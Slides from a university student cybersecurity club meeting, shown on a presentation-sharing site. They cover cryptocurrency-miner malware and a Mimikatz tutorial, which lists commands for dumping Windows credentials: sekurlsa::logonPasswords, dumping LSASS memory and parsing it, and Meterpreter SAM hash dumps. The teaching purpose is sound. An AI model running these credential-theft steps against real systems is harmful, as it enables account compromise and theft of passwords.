cyber uc meeting 29 if you re new
play

Cyber@UC Meeting 29 If Youre New! Join our Slack ucyber.slack.com - PowerPoint PPT Presentation

Mar 17, 2023 •383 likes •579 views

Cyber@UC Meeting 29 If Youre New! Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati OWASP Chapter Feel free to get involved with one of our committees: Content, Finance,

  1. Cyber@UC Meeting 29

  2. If You’re New! ● Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati ● OWASP Chapter ● Feel free to get involved with one of our committees: Content, Finance, Public Affairs, Outreach, Recruitment. Stay updated through our weekly emails and SLACK ●

  3. Announcements Babyhack : Lessons learned ● ● Cyber Range ○ Delayed Date TBD October 27/28th ACM programming challenge ● ● P&G cybersecurity center tour is still in the planning phase ● National Collegiate Cyber Defense Competition prepping will begin soon

  4. Weekly Info Session

  5. Miner Malware ● Miners are a class of malware that focuses on utilizing the infected machines to mine cryptocurrency for the attackers Easy monetization of efforts ● ● While these attacks usually do not target individuals, they tend to look for users that would have stronger GPUs, to enable faster mining This makes certain demographics, like gamers a likely target ○ ● The mining eats up system memory and is very bad for the infected machiens hardware These malwares are typically hidden inside of other software ●

  6. Miner Malware (continued) ● Some examples would be adware installers spread through social engineering Streamer ice poseidon released a game, later found that the developer of the ● game had included a bitcoin miner ● Miners, by their nature are very difficult to detect ● The use of mining malware has risen dramatically over the last few years Miners take actions to help ensure their continuation on the system ● ○ Turn off security software, turn off when system monitors are running, ensure mining software is always on the drive, restore it if not Most mining networks can generate up to $30k/month ●

  7. Miner Malware (continued) https://securelist.com/miners-on-the-rise/81706/ https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/93/cyberc riminals-unleash-bitcoinmining-malware https://waypoint.vice.com/en_us/article/mb7bkx/fans-of-notorious-streamer-ice- poseidon-revolt-over-cryptocurrency-scandal

  8. Historical Malware https://docs.google.com/presentation/d/1tznpqtVOmO2mr6jtRQl737W_XdrqbNA e9RVyHhk0HGc/edit?usp=sharing

  9. Mimikatz Password Stealing

  10. How to do it! Launch Mimikatz # Privilege::debug Output should be Privilege ‘20’ OK # sekurlsa::logonPasswords full meterpreter > getsystem meterpreter > help mimikatz

  11. How hackers do it... Open Task manager Go to Details and type lsass Right click lsass.exe and select Create Dump File Copy file location and navigate to the dump. Copy the dump to your mimikatz install folder. # sekurlsa::minidump lsass.dmp # sekurlsa::logonPasswords full

  12. Mimikatz functions

  13. Kerberos

  14. MSV credentials

  15. minikatz_command mimikatz_command -f <type of command>::<command action> If we want to retrieve password hashes from the SAM file, we can: meterpreter > mimikatzcommand -f samdump::hashes

  16. Services list meterpreter > mimikatz_command -f service::list

  17. Crypto meterpreter > mimikatz_command -f crypto::listProviders

  18. Pitfalls 1. I can’t think of any! Enjoy!

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Cyber@UC; Meeting 28 Cyber Kill Chain If Youre New! Join our Slack ucyber.slack.com

Cyber@UC; Meeting 28 Cyber Kill Chain If Youre New! Join our Slack ucyber.slack.com

Cyber@UC; Meeting 28 Cyber Kill Chain If Youre New! Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati OWASP Chapter Feel free to get involved with one of our committees:

430 views • 23 slides
NSF Activities in Cyber Trust NSF Activities in Cyber Trust NSF Activities in Cyber Trust For

NSF Activities in Cyber Trust NSF Activities in Cyber Trust NSF Activities in Cyber Trust For

NSF Activities in Cyber Trust NSF Activities in Cyber Trust NSF Activities in Cyber Trust For ACM CCS I ndustry/ Govt Track Oct. 26, 2004 Carl Landwehr ( clandweh@nsf.gov ) Cyber Trust Coordinator National Science Foundation What s the

439 views • 17 slides
CYBER CYBER-SAFETY CYBER CYBER SAFETY SAFETY SAFETY BASICS BASICS Engineering Staff College

CYBER CYBER-SAFETY CYBER CYBER SAFETY SAFETY SAFETY BASICS BASICS Engineering Staff College

3/29/2012 CYBER CYBER-SAFETY CYBER CYBER SAFETY SAFETY SAFETY BASICS BASICS Engineering Staff College of India I N T R O D U C T I O N What is Cyber-safety Consequences Threats of Inaction Cyber-safety? Cyber-safety Cyber-safety at

215 views • 7 slides
What is Cyber Crime? Cyber Enabled Crime Cyber Dependant Crime Traditional crime that is

What is Cyber Crime? Cyber Enabled Crime Cyber Dependant Crime Traditional crime that is

R egional C yber C rime U nit DC Louise Gibson Prepare, Prevent &amp; Protect What is Cyber Crime? Cyber Enabled Crime Cyber Dependant Crime Traditional crime that is enhanced in scale or Crimes that can only be committed solely reach by use

316 views • 9 slides
Cyber Security Risk Using the Cyber Security Measurement Framework Cyber Security Framework

Cyber Security Risk Using the Cyber Security Measurement Framework Cyber Security Framework

Cyber Security Risk Using the Cyber Security Measurement Framework Cyber Security Framework Reporting Objectives Executive Summary Information Assess Current Cyber Security Posture Measure Progress Toward Improvement Assess

634 views • 5 slides
The Cyber Threat: Securing Cyber Infrastructure Overview What are the FBIs Priorities?

The Cyber Threat: Securing Cyber Infrastructure Overview What are the FBIs Priorities?

The Cyber Threat: Securing Cyber Infrastructure Overview What are the FBIs Priorities? What is the FBIs Cyber Structure? HQ Division Dedicated Cyber squads in all 56 field offices, including satellite locations overseas.

1.54k views • 14 slides
Strategic Priorities Assurance Board Cyber and Cyber Enabled Crime Introduction Cyber

Strategic Priorities Assurance Board Cyber and Cyber Enabled Crime Introduction Cyber

Strategic Priorities Assurance Board Cyber and Cyber Enabled Crime Introduction Cyber Dependent crime examples of these offences are Distributed Denial of Service attack (DDOS), Account Compromise (hacking), Malware (virus) and

237 views • 7 slides
FEMA Region III Cyber Security Program Maryland Cyber Security Workshop (January 16, 2019)

FEMA Region III Cyber Security Program Maryland Cyber Security Workshop (January 16, 2019)

FEMA Region III Cyber Security Program Maryland Cyber Security Workshop (January 16, 2019) (Presented again at the October 16, 2018, meeting of the Maryland Cybersecurity Council and published with permission.) Overview Current Landscape

560 views • 23 slides
Cyber Security February - 2016 Agenda Overview of Cyber Crime The top cyber threats to UK

Cyber Security February - 2016 Agenda Overview of Cyber Crime The top cyber threats to UK

Cyber Security February - 2016 Agenda Overview of Cyber Crime The top cyber threats to UK businesses and how to remain safe What help is available Further reading Setting the scene 21.2bn The cost of fraud to the

304 views • 19 slides
Mark Fernandes Principal, Cyber Risk Services + FUTURE OF CYBER CYB CYBER SINGU GULAR ARIT

Mark Fernandes Principal, Cyber Risk Services + FUTURE OF CYBER CYB CYBER SINGU GULAR ARIT

Mark Fernandes Principal, Cyber Risk Services + FUTURE OF CYBER CYB CYBER SINGU GULAR ARIT ITY How cyber is becoming a key aspect of the ubiquity generation. CYBER SUMMIT More to come 3 2018 Deloitte Cyber Risk Services 4 2018

514 views • 19 slides
Latest in Cyber Security November 7, 2013 TCIPG Annual Meeting Douglas Maughan Division

Latest in Cyber Security November 7, 2013 TCIPG Annual Meeting Douglas Maughan Division

Homeland Security Advanced Research Projects Agency A View from Washington: The Latest in Cyber Security November 7, 2013 TCIPG Annual Meeting Douglas Maughan Division Director http://www.dhs.gov/cyber-research Presentation Outline

794 views • 32 slides
CYBER SECURITY PROTECTING AGAINST CYBER FRAUD IN SCALEUP COMPANIES AND WHAT TO DO SHOULD THEY

CYBER SECURITY PROTECTING AGAINST CYBER FRAUD IN SCALEUP COMPANIES AND WHAT TO DO SHOULD THEY

CYBER SECURITY PROTECTING AGAINST CYBER FRAUD IN SCALEUP COMPANIES AND WHAT TO DO SHOULD THEY HAPPEN London June 2019 INTRODUCTION Cyber Security The activity or process, ability or capability, or state whereby information and

735 views • 24 slides
Cy Cyber ber La Lay of the he La Land nd What the Numbers Tell Us Cyber r Lay of f the

Cy Cyber ber La Lay of the he La Land nd What the Numbers Tell Us Cyber r Lay of f the

Cy Cyber ber La Lay of the he La Land nd What the Numbers Tell Us Cyber r Lay of f the Land: : Wh What t the Numbe mbers rs Tell l Us Visit www.advisenltd.com at the end of this webinar to download: Copy of these slides

722 views • 31 slides
Cyber@UC Meeting 35 Exploit ALL the vulnerabilities! If Youre New! Join our Slack

Cyber@UC Meeting 35 Exploit ALL the vulnerabilities! If Youre New! Join our Slack

Cyber@UC Meeting 35 Exploit ALL the vulnerabilities! If Youre New! Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati OWASP Chapter Feel free to get involved with one of

563 views • 11 slides
Cyber@UC Meeting 59 Actually Doing Star Night! If Youre New! Join our Slack:

Cyber@UC Meeting 59 Actually Doing Star Night! If Youre New! Join our Slack:

Cyber@UC Meeting 59 Actually Doing Star Night! If Youre New! Join our Slack: ucyber.slack.com SIGN IN! (Slackbot will post the link in #general) Feel free to get involved with one of our committees: Content Finance Public

525 views • 23 slides
Cyber@UC Meeting 63 Contributing to the Website If Youre New! Join our Slack:

Cyber@UC Meeting 63 Contributing to the Website If Youre New! Join our Slack:

Cyber@UC Meeting 63 Contributing to the Website If Youre New! Join our Slack: ucyber.slack.com SIGN IN! (Slackbot will post the link in #general every Wed@6:30) Feel free to get involved with one of our committees: Content

491 views • 14 slides
AndRadar: Fast Discovery of Android Applications in Alternative Markets

AndRadar: Fast Discovery of Android Applications in Alternative Markets

AndRadar: Fast Discovery of Android Applications in Alternative Markets Martina Lindorfer, Stamatis Volanis, Alessandro Sisto Matthias Neugschwandtner, Elias Athanasopoulos, Federico Maggi Christian Platzer, Sotiris

735 views • 41 slides
SherlockDroid, an Inspector for Android Marketplaces Axelle Apvrille - FortiGuard Labs, Fortinet

SherlockDroid, an Inspector for Android Marketplaces Axelle Apvrille - FortiGuard Labs, Fortinet

SherlockDroid, an Inspector for Android Marketplaces Axelle Apvrille - FortiGuard Labs, Fortinet Ludovic Apvrille - Institut Mines-Telecom, Telecom ParisTech, LTCI CNRS Hack.Lu, Luxembourg October 2014 Who are we? Axelle Ludovic Hack.Lu

718 views • 55 slides
Detecting the behavioral relationships of malware connections (slides) Conference Paper August

Detecting the behavioral relationships of malware connections (slides) Conference Paper August

See discussions, stats, and author profiles for this publication at: https://www.researchgate.net/publication/307638742 Detecting the behavioral relationships of malware connections (slides) Conference Paper August 2016 CITATIONS READS 0

380 views • 17 slides
Chardae Caine Research Associate ccaine@lkm.org 785.354.9565 What is Cybersecurity? The body

Chardae Caine Research Associate ccaine@lkm.org 785.354.9565 What is Cybersecurity? The body

www.lkm.org Chardae Caine Research Associate ccaine@lkm.org 785.354.9565 What is Cybersecurity? The body of information technologies, processes, and practices designed to protect networks, computers, programs, and data from attack, damage,

444 views • 19 slides
MaMaDroid: Detecting Android Malware by Building Markov Chains of Behavioral Models Enrico

MaMaDroid: Detecting Android Malware by Building Markov Chains of Behavioral Models Enrico

MaMaDroid: Detecting Android Malware by Building Markov Chains of Behavioral Models Enrico Mariconti , Lucky Onwuzurike, Panagiotis Andriotis, Emiliano De Cristofaro, Gordon Ross, Gianluca Stringhini. NDSS 2017, 28-02-2017 Motivation: Android

1.21k views • 37 slides
Quantitative Cyber-Security Colorado State University Yashwant K Malaiya CS559 Course Overview

Quantitative Cyber-Security Colorado State University Yashwant K Malaiya CS559 Course Overview

Quantitative Cyber-Security Colorado State University Yashwant K Malaiya CS559 Course Overview (cont) CSU Cybersecurity Center Computer Science Dept 1 1 Today Security Architecture Key terms Access control and authentication 2

703 views • 47 slides
Cybersecurity Training for Nonprofit Organizations Todays threat environment Gordon Walton,

Cybersecurity Training for Nonprofit Organizations Todays threat environment Gordon Walton,

Cybersecurity Training for Nonprofit Organizations Todays threat environment Gordon Walton, President Matthew Horton, Director of Technology Alan Schwartz, Senior Systems Engineer OneWhoServes, Inc. Business Technology Services Who are

541 views • 37 slides
Threats to Mobile Devices Possible attack threats to mobile devices Network exploit

Threats to Mobile Devices Possible attack threats to mobile devices Network exploit

Threats to Mobile Devices Possible attack threats to mobile devices Network exploit Hackers takes advantage of vulnerability or flaw of users web browser on mobile device in WiFi communication to attack victims. Hackers send

464 views • 30 slides

More recommend